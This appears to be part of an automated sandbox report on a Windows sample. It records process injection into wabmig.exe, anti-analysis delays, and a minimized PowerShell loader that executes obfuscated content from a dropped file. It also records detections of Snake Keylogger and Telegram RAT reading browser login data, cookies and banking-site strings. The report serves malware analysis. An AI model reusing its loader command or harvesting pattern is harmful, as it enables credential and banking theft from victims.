            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -596453s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -596343s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -596222s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -596094s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -595968s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -595841s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -595731s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -595622s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -595515s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -595406s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -595297s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -595178s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -595049s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -594922s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -594797s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -594687s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -594578s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 1928Thread sleep time: -594469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C63
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004068B4 FindFirstFileW,FindClose,0_2_004068B4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599780Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599661Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599318Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599203Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 599093Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598982Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598762Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598648Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598546Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598326Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598216Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597890Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597671Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597343Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597234Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597116Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 597015Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596905Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596796Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596680Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596557Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596343Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596222Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 596094Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595968Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595841Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595731Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595622Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595178Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 595049Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594922Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594797Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594687Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594578Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeThread delayed: delay time: 594469Jump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: wabmig.exe, 00000007.00000002.2683738778.0000000007808000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 00000007.00000002.2683738778.000000000785F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: file.exe, 00000000.00000002.1449609091.0000000000588000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\,@
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000023E69000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
            Source: wabmig.exe, 00000007.00000002.2697467542.0000000024188000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-3669
            Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-3674
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04A7D6E4 LdrInitializeThunk,2_2_04A7D6E4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 3FD0000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 94FD9CJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Sprag=Get-Content 'C:\Users\user\AppData\Local\acneform\Camomiles.Bev';$Depurge=$Sprag.SubString(30781,3);.$Depurge($Sprag)" Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"Jump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6FF61096 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,lstrcmpiW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,lstrcpyW,GetTickCount,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,GetTickCount,ReadFile,IsTextUnicode,IsDBCSLeadByteEx,MultiByteToWideChar,lstrcpyW,GlobalReAlloc,lstrcpyW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalFree,0_2_6FF61096
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wabmig.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: Process Memory Space: wabmig.exe PID: 8168, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
